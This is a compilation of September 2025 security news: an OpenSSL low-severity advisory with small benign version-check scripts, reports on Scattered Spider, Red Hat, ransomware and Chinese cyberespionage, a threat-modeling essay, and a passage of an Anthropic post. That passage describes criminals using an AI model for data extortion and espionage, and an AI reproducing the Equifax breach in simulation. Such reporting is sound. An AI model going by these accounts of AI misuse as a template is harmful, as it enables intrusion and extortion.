The fix was developed by Stanislav Fort.

Out-of-bounds read in HTTP client no_proxy handling (CVE-2025-9232)
===================================================================

Severity: Low

Issue summary: An application using the OpenSSL HTTP client API functions may
trigger an out-of-bounds read if the "no_proxy" environment variable is set and
the host portion of the authority component of the HTTP URL is an IPv6 address.

Impact summary: An out-of-bounds read can trigger a crash which leads to
Denial of Service for an application.

The OpenSSL HTTP client API functions can be used directly by applications
but they are also used by the OCSP client functions and CMP (Certificate
Management Protocol) client implementation in OpenSSL. However the URLs used
by these implementations are unlikely to be controlled by an attacker.

In this vulnerable code the out of bounds read can only trigger a crash.
Furthermore the vulnerability requires an attacker-controlled URL to be
passed from an application to the OpenSSL function and the user has to have
a "no_proxy" environment variable set. For the aforementioned reasons the
issue was assessed as Low severity.
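As a small, hedged triage aid (not part of the advisory), the Python sketch below only checks the first of those two preconditions, namely whether a "no_proxy" environment variable is set for the current process; it says nothing about whether any OpenSSL-based HTTP, OCSP, or CMP client on the host can actually be reached with attacker-controlled IPv6 URLs.

    # Sketch: report whether "no_proxy" is set, one precondition of CVE-2025-9232.
    import os

    def no_proxy_settings():
        # Both spellings are honoured by common tooling.
        return [name for name in ("no_proxy", "NO_PROXY") if os.environ.get(name)]

    if __name__ == "__main__":
        hits = no_proxy_settings()
        if hits:
            print("no_proxy is set via:", ", ".join(hits))
        else:
            print("no_proxy is not set in this environment")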

The vulnerable code was introduced in the following patch releases:
3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as the HTTP client implementation is outside the OpenSSL FIPS module
boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2 and 3.0 are vulnerable to this issue.

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

This issue was reported on 16th August 2025 by Stanislav Fort (Aisle Research).
The fix was developed by Stanislav Fort (Aisle Research).

General Advisory Notes
======================

URL for this Security Advisory:
https://openssl-library.org/news/secadv/20250930.txt
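As a quick, hedged way to map the advisory's upgrade guidance onto a running system (an illustration, not part of the advisory), the sketch below compares the OpenSSL build linked into the local Python interpreter against the first fixed 3.x releases listed above. It parses Python's ssl.OPENSSL_VERSION string, covers only the 3.x branches (the 1.1.1 and 1.0.2 fixes are for premium support customers), and says nothing about other OpenSSL copies installed on the same host.

    # Sketch: compare the OpenSSL version linked into this Python interpreter
    # against the first fixed 3.x releases named in the advisory above.
    import re
    import ssl

    # (major, minor) branch -> first patched release, per the advisory.
    FIXED = {
        (3, 5): (3, 5, 4),
        (3, 4): (3, 4, 3),
        (3, 3): (3, 3, 5),
        (3, 2): (3, 2, 6),
        (3, 0): (3, 0, 18),
    }

    def check_linked_openssl():
        # ssl.OPENSSL_VERSION looks like "OpenSSL 3.0.13 30 Jan 2024".
        match = re.search(r"OpenSSL (\d+)\.(\d+)\.(\d+)", ssl.OPENSSL_VERSION)
        if not match:
            return "unrecognised version string: " + ssl.OPENSSL_VERSION
        version = tuple(int(part) for part in match.groups())
        fixed = FIXED.get(version[:2])
        if fixed is None:
            return f"{version}: branch not covered here (see advisory for 1.1.1 / 1.0.2)"
        if version >= fixed:
            return f"{version}: at or above the fixed release {fixed}"
        return f"{version}: predates the fixed release {fixed}; plan an upgrade"

    if __name__ == "__main__":
        print(check_linked_openssl())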

Feds Tie ‘Scattered Spider’ Duo to $115M in Ransoms

– Krebs on Security
U.S. prosecutors last week levied criminal hacking charges against 19-year-old U.K. national Thalha Jubair for allegedly being a core member of Scattered Spider, a prolific cybercrime group blamed for extorting at least $115 million in ransom payments from victims. The charges came as Jubair and an alleged co-conspirator appeared in a London court to face accusations of hacking into and extorting several large U.K. retailers, the London transit system, and healthcare providers in the United States.

At a court hearing last week, U.K. prosecutors laid out a litany of charges against Jubair and 18-year-old Owen Flowers, accusing the teens of involvement in an August 2024 cyberattack that crippled Transport for London, the entity responsible for the public transport network in the Greater London area.

Digital Threat Modeling Under Authoritarianism

Schneier on Security - schneier.com/blog/ - Posted on September 26, 2025 at 7:04 AM

Today’s world requires us to make complex and nuanced decisions about our digital security. Evaluating when to use a secure messaging app like Signal or WhatsApp, which passwords to store on your smartphone, or what to share on social media requires us to assess risks and make judgments accordingly. Arriving at any conclusion is an exercise in threat modeling.

In security, threat modeling is the process of determining what security measures make sense in your particular situation. It’s a way to think about potential risks, possible defenses, and the costs of both. It’s how experts avoid being distracted by irrelevant risks or overburdened by undue costs.

We threat model all the time. We might decide to walk down one street instead of another, or use an internet VPN when browsing dubious sites. Perhaps we understand the risks in detail, but more likely we are relying on intuition or some trusted authority. But in the U.S. and elsewhere, the average person’s threat model is changing—specifically involving how we protect our personal information. Previously, most concern centered on corporate surveillance; companies like Google and Facebook engaging in digital surveillance to maximize their profit. Increasingly, however, many people are worried about government surveillance and how the government could weaponize personal data.

Since the beginning of this year, the Trump administration’s actions in this area have raised alarm bells: The Department of Government Efficiency (DOGE) took data from federal agencies, Palantir combined disparate streams of government data into a single system, and Immigration and Customs Enforcement (ICE) used social media posts as a reason to deny someone entry into the U.S.

These threats, and others posed by a techno-authoritarian regime, are vastly different from those presented by a corporate monopolistic regime—and different yet again in a society where both are working together. Contending with these new threats requires a different approach to personal digital devices, cloud services, social media, and data in general.

What Data Does the Government Already Have?
For years, most public attention has centered on the risks of tech companies gathering behavioral data. This is an enormous amount of data, generally used to predict and influence consumers’ future behavior—rather than as a means of uncovering our past. Although commercial data is highly intimate—such as knowledge of your precise location over the course of a year, or the contents of every Facebook post you have ever created—it’s not the same thing as tax returns, police records, unemployment insurance applications, or medical history.

The U.S. government holds extensive data about everyone living inside its borders, some of it very sensitive—and there’s not much that can be done about it. This information consists largely of facts that people are legally obligated to tell the government. The IRS has a lot of very sensitive data about personal finances. The Treasury Department has data about any money received from the government. The Office of Personnel Management has an enormous amount of detailed information about government employees—including the very personal form required to get a security clearance. The Census Bureau possesses vast data about everyone living in the U.S., including, for example, a database of real estate ownership in the country. The Department of Defense and the Bureau of Veterans Affairs have data about present and former members of the military, the Department of Homeland Security has travel information, and various agencies possess health records. And so on.

It is safe to assume that the government has—or will soon have—access to all of this government data. This sounds like a tautology, but in the past, the U.S. government largely followed the many laws limiting how those databases were used, especially regarding how they were shared, combined, and correlated. Under the second Trump administration, this no longer seems to be the case.

Augmenting Government Data with Corporate Data
The mechanisms of corporate surveillance haven’t gone away. Compute technology is constantly spying on its users—and that data is being used to influence us. Companies like Google and Meta are vast surveillance machines, and they use that data to fuel advertising. A smartphone is a portable surveillance device, constantly recording things like location and communication. Cars, and many other Internet of Things devices, do the same. Credit card companies, health insurers, internet retailers, and social media sites all have detailed data about you—and there is a vast industry that buys and sells this intimate data.

This isn’t news. What’s different in a techno-authoritarian regime is that this data is also shared with the government, either as a paid service or as demanded by local law. Amazon shares Ring doorbell data with the police. Flock, a company that collects license plate data from cars around the country, shares data with the police as well. And just as Chinese corporations share user data with the government and companies like Verizon shared calling records with the National Security Agency (NSA) after the Sept. 11 terrorist attacks, an authoritarian government will use this data as well.

Personal Targeting Using Data
The government has vast capabilities for targeted surveillance, both technically and legally. If a high-level figure is targeted by name, it is almost certain that the government can access their data. The government will use its investigatory powers to the fullest: It will go through government data, remotely hack phones and computers, spy on communications, and raid a home. It will compel third parties, like banks, cell providers, email providers, cloud storage services, and social media companies, to turn over data. To the extent those companies keep backups, the government will even be able to obtain deleted data.

This data can be used for prosecution—possibly selectively. This has been made evident in recent weeks, as the Trump administration personally targeted perceived enemies for “mortgage fraud.” This was a clear example of weaponization of data. Given all the data the government requires people to divulge, there will be something there to prosecute.

Although alarming, this sort of targeted attack doesn’t scale. As vast as the government’s information is and as powerful as its capabilities are, they are not infinite. They can be deployed against only a limited number of people. And most people will never be that high on the priorities list.

The Risks of Mass Surveillance
Mass surveillance is surveillance without specific targets. For most people, this is where the primary risks lie. Even if we’re not targeted by name, personal data could raise red flags, drawing unwanted scrutiny.

The risks here are twofold. First, mass surveillance could be used to single out people to harass or arrest: when they cross the border, show up at immigration hearings, attend a protest, are stopped by the police for speeding, or just as they’re living their normal lives. Second, mass surveillance could be used to threaten or blackmail. In the first case, the government is using that database to find a plausible excuse for its actions. In the second, it is looking for an actual infraction that it could selectively prosecute—or not.

Mitigating these risks is difficult, because it would require not interacting with either the government or corporations in everyday life—and living in the woods without any electronics isn’t realistic for most of us. Additionally, this strategy protects only future information; it does nothing to protect the information generated in the past. That said, going back and scrubbing social media accounts and cloud storage does have some value. Whether it’s right for you depends on your personal situation.

Opportunistic Use of Data
Beyond data given to third parties—either corporations or the government—there is also data users keep in their possession. This data may be stored on personal devices such as computers and phones or, more likely today, in some cloud service and accessible from those devices. Here, the risks are different: Some authority could confiscate your device and look through it.

This is not just speculative. There are many stories of ICE agents examining people’s phones and computers when they attempt to enter the U.S.: their emails, contact lists, documents, photos, browser history, and social media posts.

There are several different defenses you can deploy, presented from least to most extreme. First, you can scrub devices of potentially incriminating information, either as a matter of course or before entering a higher-risk situation. Second, you could consider deleting—even temporarily—social media and other apps so that someone with access to a device doesn’t get access to those accounts—this includes your contacts list. If a phone is swept up in a government raid, your contacts become their next targets.

Third, you could choose not to carry your device with you at all, opting instead for a burner phone without contacts, email access, and accounts, or go electronics-free entirely. This may sound extreme—and getting it right is hard—but I know many people today who have stripped-down computers and sanitized phones for international travel. At the same time, there are also stories of people being denied entry to the U.S. because they are carrying what is obviously a burner phone—or no phone at all.

Encryption Isn’t a Magic Bullet—But Use It Anyway
Encryption protects your data while it’s not being used, and your devices when they’re turned off. This doesn’t help if a border agent forces you to turn on your phone and computer. And it doesn’t protect metadata, which needs to be unencrypted for the system to function. This metadata can be extremely valuable. For example, Signal, WhatsApp, and iMessage all encrypt the contents of your text messages—the data—but information about who you are texting and when must remain unencrypted.

Also, if the NSA wants access to someone’s phone, it can get it. Encryption is no help against that sort of sophisticated targeted attack. But, again, most of us aren’t that important and even the NSA can target only so many people. What encryption safeguards against is mass surveillance.

I recommend Signal for text messages above all other apps. But if you are in a country where having Signal on a device is in itself incriminating, then use WhatsApp. Signal is better, but everyone has WhatsApp installed on their phones, so it doesn’t raise the same suspicion. Also, it’s a no-brainer to turn on your computer’s built-in encryption: BitLocker for Windows and FileVault for Macs.

On the subject of data and metadata, it’s worth noting that data poisoning doesn’t help nearly as much as you might think. That is, it doesn’t do much good to add hundreds of random strangers to an address book or bogus internet searches to a browser history to hide the real ones. Modern analysis tools can see through all of that.

Shifting Risks of Decentralization
This notion of individual targeting, and the inability of the government to do that at scale, starts to fail as the authoritarian system becomes more decentralized. After all, if repression comes from the top, it affects only senior government officials and people whom those in power personally dislike. If it comes from the bottom, it affects everybody. But decentralization looks much like the events playing out now, with ICE harassing, detaining, and disappearing people—everyone has to fear it.

This can go much further. Imagine there is a government official assigned to your neighborhood, or your block, or your apartment building. It’s worth that person’s time to scrutinize everybody’s social media posts, email, and chat logs. For anyone in that situation, limiting what you do online is the only defense.

Being Innocent Won’t Protect You
This is vital to understand. Surveillance systems and sorting algorithms make mistakes. This is apparent in the fact that we are routinely served advertisements for products that don’t interest us at all. Those mistakes are relatively harmless—who cares about a poorly targeted ad?—but a similar mistake at an immigration hearing can get someone deported.

An authoritarian government doesn’t care. Mistakes are a feature and not a bug of authoritarian surveillance. If ICE targets only people it can go after legally, then everyone knows whether or not they need to fear ICE. If ICE occasionally makes mistakes by arresting Americans and deporting innocents, then everyone has to fear it. This is by design.

Effective Opposition Requires Being Online
For most people, phones are an essential part of daily life. If you leave yours at home when you attend a protest, you won’t be able to film police violence. Or coordinate with your friends and figure out where to meet. Or use a navigation app to get to the protest in the first place.

Threat modeling is all about trade-offs. Understanding yours depends not only on the technology and its capabilities but also on your personal goals. Are you trying to keep your head down and survive—or get out? Are you wanting to protest legally? Are you doing more, maybe throwing sand into the gears of an authoritarian government, or even engaging in active resistance? The more you are doing, the more technology you need—and the more technology will be used against you. There are no simple answers, only choices.

Red Hat confirms security incident after hackers claim GitHub breach

bleepingcomputer.com By Lawrence Abrams
October 2, 2025 02:15 AM

An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.

This data allegedly includes approximately 800 Customer Engagement Reports (CERs), which can contain sensitive information about a customer's network and platforms.

A CER is a consulting document prepared for clients that often contains infrastructure details, configuration data, authentication tokens, and other information that could be abused to breach customer networks.

Red Hat confirmed that it suffered a security incident related to its consulting business, but would not verify any of the attacker's claims regarding the stolen GitHub repositories and customer CERs.

"Red Hat is aware of reports regarding a security incident related to our consulting business and we have initiated necessary remediation steps," Red Hat told BleepingComputer.

"The security and integrity of our systems and the data entrusted to us are our highest priority. At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain."

While Red Hat did not respond to any further questions about the breach, the hackers told BleepingComputer that the intrusion occurred approximately two weeks ago.

They allegedly found authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure.

The hacking group also published a complete directory listing of the allegedly stolen GitHub repositories and a list of CERs from 2020 through 2025 on Telegram.

The directory listing of CERs includes a wide range of sectors and well-known organizations such as Bank of America, T-Mobile, AT&T, Fidelity, Kaiser, Mayo Clinic, Walmart, Costco, the U.S. Navy’s Naval Surface Warfare Center, the Federal Aviation Administration, the House of Representatives, and many others.

The hackers stated that they attempted to contact Red Hat with an extortion demand but received no response other than a templated reply instructing them to submit a vulnerability report to their security team.

According to them, the ticket they created was repeatedly reassigned to additional people, including members of Red Hat's legal and security staff.

BleepingComputer sent Red Hat additional questions, and we will update this story if we receive more information.

The same group also claimed responsibility for briefly defacing Nintendo’s topic page last week to include contact information and links to their Telegram channel.

Cyberincident bugnard.ch

Official statement – Bugnard SA bugnard.ch

Dear customers, dear partners,

Late in the day on September 24, 2025, we detected an intrusion into Bugnard SA's IT infrastructure by the Akira ransomware. This attack affected our servers as well as our website.
As a security measure, we immediately cut off access to the platform in order to protect the integrity of your data and of our systems.
Our IT team is mobilized on site and is working with the highest priority to restore the situation. If necessary, we will restore our latest backup in order to bring the site back into service as quickly as possible.
At this stage, we estimate that the site could be back online between Wednesday and Friday of this week.
We are fully aware that 72% of our business goes through our website, and we are doing everything we can so that you can place your orders again quickly and securely.
In the meantime, our sales team remains available by phone and email to handle your urgent needs.
We will keep you informed as the situation develops, and we thank you for your understanding and your trust.

With best regards,
Christian Degouy
CEO

Microsoft’s new Security Store is like an app store for cybersecurity | The Verge

Cybersecurity workers can also start creating their own Security Copilot AI agents.

Microsoft is launching a Security Store that will be full of security software-as-a-service (SaaS) solutions and AI agents. It’s part of a broader effort to sell Microsoft’s Sentinel security platform to businesses, complete with Microsoft Security Copilot AI agents that can be built by security teams to help tackle the latest threats.

The Microsoft Security Store is a storefront designed for security professionals to buy and deploy SaaS solutions and AI agents from Microsoft’s ecosystem partners. Darktrace, Illumio, Netskope, Performanta, and Tanium are all part of the new store, with solutions covering threat protection, identity and device management, and more.

A lot of the solutions will integrate with Microsoft Defender, Sentinel, Entra, Purview, or Security Copilot, making them quick to onboard for businesses that are fully reliant on Microsoft for their security needs. This should cut down on procurement and onboarding times, too.

Alongside the Security Store, Microsoft is also allowing Security Copilot users to build their own AI agents. Microsoft launched some of its own security AI agents earlier this year, and now security teams can use a tool similar to Copilot Studio to build their own. You simply create an AI agent through a set of prompts and then publish it, all with no code required. These Security Copilot agents will also be available in the Security Store today.

How China’s Secretive Spy Agency Became a Cyber Powerhouse

nytimes.com
By Chris Buckley and Adam Goldman
Sept. 28, 2025

Fears of U.S. surveillance drove Xi Jinping, China’s leader, to elevate the agency and put it at the center of his cyber ambitions.

American officials were alarmed in 2023 when they discovered that Chinese state-controlled hackers had infiltrated critical U.S. infrastructure with malicious code that could wreck power grids, communications systems and water supplies. The threat was serious enough that William J. Burns, the director of the C.I.A., made a secret trip to Beijing to confront his Chinese counterpart.

He warned China’s minister of state security that there would be “serious consequences” for Beijing if it unleashed the malware. The tone of the meeting, details of which have not been previously reported, was professional and it appeared the message was delivered.

But since that meeting, which was described by two former U.S. officials, China’s intrusions have only escalated. (The former officials spoke on the condition of anonymity because they were not authorized to speak publicly about the sensitive meeting.)

American and European officials say China’s Ministry of State Security, the civilian spy agency often called the M.S.S., in particular, has emerged as the driving force behind China’s most sophisticated cyber operations.

In recent disclosures, officials revealed another immense, yearslong intrusion by hackers who have been collectively called Salt Typhoon, one that may have stolen information about nearly every American and targeted dozens of other countries. Some countries hit by Salt Typhoon warned in an unusual statement that the data stolen could provide Chinese intelligence services with the capability to “identify and track their targets’ communications and movements around the world.”

The attack underscored how the Ministry of State Security has evolved into a formidable cyberespionage agency capable of audacious operations that can evade detection for years, experts said.

For decades, China has used for-hire hackers to break into computer networks and systems. These operatives sometimes mixed espionage with commercial data theft or were sloppy, exposing their presence. In the recent operation by Salt Typhoon, however, intruders linked to the M.S.S. found weaknesses in systems, burrowed into networks, spirited out data, hopped between compromised systems and erased traces of their presence.
“Salt Typhoon shows a highly skilled and strategic side to M.S.S. cyber operations that has been missed with the attention on lower-quality contract hackers,” said Alex Joske, the author of a book on the ministry.

For Washington, the implication of China’s growing capability is clear: In a future conflict, China could put U.S. communications, power and infrastructure at risk.

China’s biggest hacking campaigns have been “strategic operations” intended to intimidate and deter rivals, said Nigel Inkster, a senior adviser for cybersecurity and China at the International Institute for Strategic Studies in London.

“If they succeed in remaining on these networks undiscovered, that potentially gives them a significant advantage in the event of a crisis,” said Mr. Inkster, formerly director of operations and intelligence in the British Secret Intelligence Service, MI6. “If their presence is — as it has been — discovered, it still exercises a very significant deterrent effect; as in, ‘Look what we could do to you if we wanted.’”

The Rise of the M.S.S.
China’s cyber advances reflect decades of investment to try to match, and eventually rival, the U.S. National Security Agency and Britain’s Government Communications Headquarters, or GCHQ.

China’s leaders founded the Ministry of State Security in 1983 mainly to track dissidents and perceived foes of Communist Party rule. The ministry engaged in online espionage but was long overshadowed by the Chinese military, which ran extensive cyberspying operations.

After taking power as China’s top leader in 2012, Xi Jinping moved quickly to reshape the M.S.S. He seemed unsettled by the threat of U.S. surveillance to China’s security, and in a 2013 speech pointed to the revelations of Edward J. Snowden, the former U.S. intelligence contractor.

Mr. Xi purged the ministry of senior officials accused of corruption and disloyalty. He reined in the hacking role of the Chinese military, elevating the ministry as the country’s primary cyberespionage agency. He put national security at the core of his agenda with new laws and by establishing a new commission.

“At this same time, the intelligence requirements imposed on the security apparatus start to multiply, because Xi wanted to do more things abroad and at home,” said Matthew Brazil, a senior analyst at BluePath Labs who has co-written a history of China’s espionage services.

Since around 2015, the M.S.S. has moved to bring its far-flung provincial offices under tighter central control, said experts. Chen Yixin, the current minister, has demanded that local state security offices follow Beijing’s orders without delay. Security officials, he said on a recent inspection of the northeast, must be both “red and expert” — absolutely loyal to the party while also adept in technology.

“It all essentially means that the Ministry of State Security now sits atop a system in which it can move its pieces all around the chessboard,” said Edward Schwarck, a researcher at the University of Oxford who is writing a dissertation on China’s state security.

Mr. Chen was the official who met with Mr. Burns in May 2023. He gave nothing away when confronted with the details of the cyber campaign, telling Mr. Burns he would let his superiors know about the U.S. concerns, the former officials said.

The Architect of China’s Cyber Power
The Ministry of State Security operates largely in the shadows, its officials rarely seen or named in public. There was one exception: Wu Shizhong, who was a senior official in Bureau 13, the “technical reconnaissance” arm of the ministry.

Mr. Wu was unusually visible, turning up at meetings and conferences in his other role as director of the China Information Technology Security Evaluation Center. Officially, the center vets digital software and hardware for security vulnerabilities before it can be used in China. Unofficially, foreign officials and experts say, the center comes under the control of the M.S.S. and provided a direct pipeline of information about vulnerabilities and hacking talent.

Mr. Wu has not publicly said he served in the security ministry, but a Chinese university website in 2005 described him as a state security bureau head in a notice about a meeting, and investigations by CrowdStrike and other cybersecurity firms have also described his state security role.

“Wu Shizhong is widely recognized as a leading figure in the creation of M.S.S. cyber capabilities,” said Mr. Joske.

In 2013, Mr. Wu pointed to two lessons for China: Mr. Snowden’s disclosures about American surveillance and the use by the United States of a virus to sabotage Iran’s nuclear facilities. “The core of cyber offense and defense capabilities is technical prowess,” he said, stressing the need to control technologies and exploit their weaknesses. China, he added, should create “a national cyber offense and defense apparatus.”

China’s commercial tech sector boomed in the years that followed, and state security officials learned how to put domestic companies and contractors to work, spotting and exploiting flaws and weak spots in computer systems, several cybersecurity experts said. The U.S. National Security Agency has also hoarded knowledge of software flaws for its own use. But China has an added advantage: It can tap its own tech companies to feed information to the state.
“M.S.S. was successful at improving the talent pipeline and the volume of good offensive hackers they could contract to,” said Dakota Cary, a researcher who focuses on China’s efforts to develop its hacking capabilities at SentinelOne. “This gives them a significant pipeline for offensive tools.”

The Chinese government also imposed rules requiring that any newly found software vulnerabilities be reported first to a database that analysts say is operated by the M.S.S., giving security officials early access. Other policies reward tech firms with payments if they meet monthly quotas of finding flaws in computer systems and submitting them to the state security-controlled database.

“It’s a prestige thing and it’s good for a company’s reputation,” Mei Danowski, the co-founder of Natto Thoughts, a company that advises clients on cyber threats, said of the arrangement. “These business people don’t feel like they are doing something wrong. They feel like they are doing something for their country.”

Jaguar Land Rover Gets Government Loan Guarantee to Support Supply Chain; Restarts Production

The Wall Street Journal
By Dominic Chopping
Updated Sept. 29, 2025 6:39 am ET

Jaguar Land Rover discovered a cyberattack late last month, forcing the company to shut down its computer systems and halt production.

Jaguar Land Rover will restart some sections of its manufacturing operations in the coming days, as it begins its recovery from a cyberattack that has crippled production for around a month.

“As the controlled, phased restart of our operations continues, we are taking further steps towards our recovery and the return to manufacture of our world‑class vehicles,” the company said in a statement Monday.

The news comes a day after the U.K. government stepped in to provide financial support for the company, underwriting a 1.5 billion-pound ($2.01 billion) loan guarantee in a bid to support the company’s cash reserves and help it pay suppliers.

The loan will be provided by a commercial bank and is backed by the government’s export credit agency. It will be paid back over five years.

“Jaguar Land Rover is an iconic British company which employs tens of thousands of people,” U.K. Treasury Chief Rachel Reeves said in a statement Sunday.

“Today we are protecting thousands of those jobs with up to 1.5 billion pounds in additional private finance, helping them support their supply chain and protect a vital part of the British car industry,” she added.

The U.K. automaker, owned by India’s Tata Motors, discovered a cyberattack late last month, forcing the company to shut down its computer systems and halt production.

The company behind the Land Rover, Jaguar and Range Rover models has been forced to repeatedly extend the production shutdown over the past few weeks as it races to restart systems safely with the help of cybersecurity experts flown in from around the globe, the U.K.’s National Cyber Security Centre and law enforcement.

Last week, the company began a gradual restart of its operations, bringing some IT systems back online. It has informed suppliers and retail partners that sections of its digital network are back up and running, and that processing capacity for invoicing has been increased as it works to quickly clear the backlog of payments to suppliers.

JLR has U.K. plants in Solihull and Wolverhampton in the West Midlands, in addition to Halewood in Merseyside. It is one of the U.K.’s largest exporters and a major employer, employing 34,000 directly in its U.K. operations. It also operates the largest supply chain in the U.K. automotive sector, much of it made up of small- and medium-sized enterprises, and employing around 120,000 people, according to the government.

Labor unions had warned that thousands of jobs in the JLR supply chain were at risk due to the disruption and had urged the government to step in with a furlough plan to support them.

U.K. trade union Unite, which represents thousands of workers employed at JLR and throughout its supply chain, said the government’s loan guarantee is an important first step.

“The money provided must now be used to ensure job guarantees and to also protect skills and pay in JLR and its supply chain,” Unite general secretary Sharon Graham said in a statement.

AI for Cyber Defenders

red.anthropic.com September 29, 2025 ANTHROPIC

AI models are now useful for cybersecurity tasks in practice, not just theory. As research and experience demonstrated the utility of frontier AI as a tool for cyber attackers, we invested in improving Claude’s ability to help defenders detect, analyze, and remediate vulnerabilities in code and deployed systems. This work allowed Claude Sonnet 4.5 to match or eclipse Opus 4.1, our frontier model released only two months prior, in discovering code vulnerabilities and other cyber skills. Adopting and experimenting with AI will be key for defenders to keep pace.

We believe we are now at an inflection point for AI’s impact on cybersecurity.

For several years, our team has carefully tracked the cybersecurity-relevant capabilities of AI models. Initially, we found that models were not particularly powerful at advanced, meaningful cyber tasks. However, over the past year or so, we’ve noticed a shift. For example:

We showed that models could reproduce one of the costliest cyberattacks in history—the 2017 Equifax breach—in simulation.
We entered Claude into cybersecurity competitions, and it outperformed human teams in some cases.
Claude has helped us discover vulnerabilities in our own code and fix them before release.
In this summer’s DARPA AI Cyber Challenge, teams used LLMs (including Claude) to build “cyber reasoning systems” that examined millions of lines of code for vulnerabilities to patch. In addition to inserted vulnerabilities, teams found (and sometimes patched) previously undiscovered, non-synthetic vulnerabilities. Beyond a competition setting, other frontier labs now apply models to discover and report novel vulnerabilities.

At the same time, as part of our Safeguards work, we have found and disrupted threat actors on our own platform who leveraged AI to scale their operations. Our Safeguards team recently discovered (and disrupted) a case of “vibe hacking,” in which a cybercriminal used Claude to build a large-scale data extortion scheme that previously would have required an entire team of people. Safeguards has also detected and countered Claude's use in increasingly complex espionage operations, including the targeting of critical telecommunications infrastructure, by an actor that demonstrated characteristics consistent with Chinese APT operations.

All of these lines of evidence lead us to think we are at an important inflection point in the cyber ecosystem, and progress from here could become quite fast or usage could grow quite quickly.

Therefore, now is an important moment to accelerate defensive use of AI to secure code and infrastructure. We should not cede the cyber advantage derived from AI to attackers and criminals. While we will continue to invest in detecting and disrupting malicious attackers, we think the most scalable solution is to build AI systems that empower those safeguarding our digital environments—like security teams protecting businesses and governments, cybersecurity researchers, and maintainers of critical open-source software.

In the run-up to the release of Claude Sonnet 4.5, we started to do just that.

Claude Sonnet 4.5: emphasizing cyber skills
As LLMs scale in size, “emergent abilities”—skills that were not evident in smaller models and were not necessarily an explicit target of model training—appear. Indeed, Claude’s abilities to execute cybersecurity tasks like finding and exploiting software vulnerabilities in Capture-the-Flag (CTF) challenges have been byproducts of developing generally useful AI assistants.

But we don’t want to rely on general model progress alone to better equip defenders. Because of the urgency of this moment in the evolution of AI and cybersecurity, we dedicated researchers to making Claude better at key skills like code vulnerability discovery and patching.

The results of this work are reflected in Claude Sonnet 4.5. It is comparable or superior to Claude Opus 4.1 in many aspects of cybersecurity while also being less expensive and faster.

Evidence from evaluations
In building Sonnet 4.5, we had a small research team focus on enhancing Claude’s ability to find vulnerabilities in codebases, patch them, and test for weaknesses in simulated deployed security infrastructure. We chose these because they reflect important tasks for defensive actors. We deliberately avoided enhancements that clearly favor offensive work—such as advanced exploitation or writing malware. We hope to enable models to find insecure code before deployment and to find and fix vulnerabilities in deployed code. There are, of course, many more critical security tasks we did not focus on; at the end of this post, we elaborate on future directions.

To test the effects of our research, we ran industry-standard evaluations of our models. These enable clear comparisons across models, measure the speed of AI progress, and—especially in the case of novel, externally developed evaluations—provide a good metric to ensure that we are not simply teaching to our own tests.

As we ran these evaluations, one thing that stood out was the importance of running them many times. Even though this is computationally expensive for a large set of evaluation tasks, repeated attempts better capture the behavior of a motivated attacker or defender on any particular real-world problem. Doing so reveals impressive performance not only from Claude Sonnet 4.5, but also from models several generations older.

Cybench
One of the evaluations we have tracked for over a year is Cybench, a benchmark drawn from CTF competition challenges.[1] On this evaluation, we see striking improvement from Claude Sonnet 4.5, not just over Claude Sonnet 4, but even over Claude Opus 4 and 4.1 models. Perhaps most striking, Sonnet 4.5 achieves a higher probability of success given one attempt per task than Opus 4.1 when given ten attempts per task. The challenges that are part of this evaluation reflect somewhat complex, long-duration workflows. For example, one challenge involved analyzing network traffic, extracting malware from that traffic, and decompiling and decrypting the malware. We estimate that this would have taken a skilled human at least an hour, and possibly much longer; Claude took 38 minutes to solve it.

When we give Claude Sonnet 4.5 ten attempts at the Cybench evaluation, it succeeds on 76.5% of the challenges. This is particularly noteworthy because we have doubled this success rate in just the past six months (Sonnet 3.7, released in February 2025, had only a 35.9% success rate when given ten trials).

Figure 1: Model Performance on Cybench—Claude Sonnet 4.5 significantly outperforms all previous models given k=1, 10, or 30 trials, where probability of success is measured as the expectation over the proportion of problems where at least one of k trials succeeds. Note that these results are on a subset of 37 of the 40 original Cybench problems, where 3 problems were excluded due to implementation difficulties.
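For readers unfamiliar with the k-trial metric used in these figures, the sketch below shows one common way to compute it: the unbiased per-problem pass@k estimator, 1 - C(n-c, k)/C(n, k), which is then averaged across problems. This is our own illustration and an assumption about the computation (the post does not publish its evaluation code), and the trial counts in the example are made up.

package main

import "fmt"

// passAtK is the standard unbiased pass@k estimator: given n recorded trials
// on a problem, of which c succeeded, it returns the probability that at
// least one of k randomly chosen trials succeeds, i.e. 1 - C(n-c, k)/C(n, k).
func passAtK(n, c, k int) float64 {
    if n-c < k {
        return 1.0 // every size-k subset contains at least one success
    }
    prod := 1.0
    for i := n - c + 1; i <= n; i++ {
        prod *= 1.0 - float64(k)/float64(i)
    }
    return 1.0 - prod
}

func main() {
    // Hypothetical problem: 30 recorded trials, 12 of them successful.
    for _, k := range []int{1, 10, 30} {
        fmt.Printf("pass@%-2d = %.3f\n", k, passAtK(30, 12, k))
    }
}

Averaging this quantity over all problems in the benchmark yields the curves reported for k = 1, 10, and 30.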
CyberGym
In another external evaluation, we evaluated Claude Sonnet 4.5 on CyberGym, a benchmark that evaluates the ability of agents to (1) find (previously-discovered) vulnerabilities in real open-source software projects given a high-level description of the weakness, and (2) discover new (previously-undiscovered) vulnerabilities.[2] The CyberGym team previously found that Claude Sonnet 4 was the strongest model on their public leaderboard.

